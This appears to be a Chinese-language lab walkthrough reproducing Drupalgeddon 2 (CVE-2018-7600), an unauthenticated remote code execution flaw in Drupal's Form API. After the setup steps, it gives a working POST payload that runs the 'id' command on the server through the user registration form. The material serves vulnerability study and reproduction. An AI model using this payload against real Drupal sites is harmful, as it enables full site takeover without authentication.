# Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)
Drupal 是一款用量庞大的CMS,其6/7/8版本的Form API中存在一处远程代码执行漏洞,Drupal 对 Form API (FAPI) AJAX 请求的输入卫生不足。 结果,这使攻击者能够潜在地将恶意负载注入到内部表单结构中。 这将导致 Drupal 在没有用户身份验证的情况下执行它。 通过利用此漏洞,攻击者将能够对任何 Drupal 客户进行完整的站点接管。
启动环境之后,浏览器进行访问,看到是drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。
安装完成之后是这样的
接下来进行漏洞利用,参考https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py,通过bp抓包,直接抓取这个页面的数据包(安装完drupal是登录状态的话需退出登录才能访问到这个页面)
然后添加post请求数据
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
可以看到id命令被成功执行